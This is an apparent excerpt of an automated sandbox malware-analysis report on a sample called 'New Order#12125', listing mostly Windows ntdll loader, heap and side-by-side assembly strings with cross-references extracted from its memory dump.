                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        Strings
                                                                        • VerifierDebug, xrefs: 01588CA5
                                                                        • VerifierDlls, xrefs: 01588CBD
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01588A67
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01588A3D
                                                                        • HandleTraces, xrefs: 01588C8F
                                                                        • VerifierFlags, xrefs: 01588C50
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01588B8F
                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        Strings
                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015599ED
                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01559A01
                                                                        • apphelp.dll, xrefs: 014F6496
                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01559A2A
                                                                        • LdrpInitShimEngine, xrefs: 015599F4, 01559A07, 01559A30
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01559A11, 01559A3A
                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        Strings
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015721BF
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01572180
                                                                        • SXS: %s() passed the empty activation context, xrefs: 01572165
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01572160, 0157219A, 015721BA
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0157219F
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01572178
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        Strings
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01578181, 015781F5
                                                                        • LdrpInitializeImportRedirection, xrefs: 01578177, 015781EB
                                                                        • LdrpInitializeProcess, xrefs: 0153C6C4
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01578170
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 015781E5
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0153C6C3
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                        APIs
                                                                          • Part of subcall function 01542DF0: LdrInitializeThunk.NTDLL ref: 01542DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540D74
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        Strings
                                                                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01567D39
                                                                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01567D03
                                                                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01567D56
                                                                        • SsHd, xrefs: 0151A885
                                                                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        Strings
                                                                        • @, xrefs: 01538591
                                                                        • LdrpInitializeProcess, xrefs: 01538422
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0153855E
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01538421
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        Strings
                                                                        • HEAP: , xrefs: 015654E0, 015655A1
                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 015654ED
                                                                        • HEAP[%wZ]: , xrefs: 015654D1, 01565592
                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 015655AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                        • API String ID: 0-1657114761
                                                                        Strings
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015721D9, 015722B1
                                                                        • SXS: %s() passed the empty activation context, xrefs: 015721DE
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015722B6
                                                                        • .Local, xrefs: 015328D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        Strings
                                                                        • RtlDeactivateActivationContext, xrefs: 01573425, 01573432, 01573451
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01573437
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0157342A
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01573456
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0156106B
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015610AE
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01561028
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01560FE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        • API String ID: 0-1468400865
                                                                        Strings
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0156A992
                                                                        • apphelp.dll, xrefs: 01522462
                                                                        • LdrpDynamicShimModule, xrefs: 0156A998
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0156A9A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-176724104
                                                                        Strings
                                                                        • HEAP: , xrefs: 01513264
                                                                        • HEAP[%wZ]: , xrefs: 01513255
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0151327D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        • API String ID: 0-617086771
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                        • API String ID: 0-1670051934
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        Strings
                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01501728
                                                                        • HEAP: , xrefs: 01501596
                                                                        • HEAP[%wZ]: , xrefs: 01501712
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@
                                                                        • API String ID: 0-1077428164
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        Strings
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0156A10F
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0156A121
                                                                        • LdrpCheckModule, xrefs: 0156A117
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-161242083
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        Strings
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 015782DE
                                                                        • Failed to reallocate the system dirs string !, xrefs: 015782D7
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 015782E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        Strings
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015BC1C5
                                                                        • PreferredUILanguages, xrefs: 015BC212
                                                                        • @, xrefs: 015BC1F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        Strings
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01584899
                                                                        • LdrpCheckRedirection, xrefs: 0158488F
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01584888
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        Strings
                                                                        • LdrpInitializationFailure, xrefs: 015820FA
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 015820F3
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01582104
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@
                                                                        • API String ID: 0-149943524
                                                                        Strings
                                                                        • LdrResSearchResource Exit, xrefs: 0150AA25
                                                                        • LdrResSearchResource Enter, xrefs: 0150AA13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @4Qw@4Qw$PATH
                                                                        • API String ID: 0-1814558670
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        Strings
                                                                        • Failed to retrieve service checksum., xrefs: 0155EE56
                                                                        • ResIdCount less than 2., xrefs: 0155EEC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                        • API String ID: 0-863616075
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        Strings
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0150063D
                                                                        • kLsE, xrefs: 01500540
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 0-2547482624
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0150A309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0150A2FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P`?wRb?w
                                                                        • API String ID: 0-3112501033
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: __aullrem
                                                                        • String ID:
                                                                        • API String ID: 3758378126-0
                                                                        Strings
                                                                        Memory Dump Source
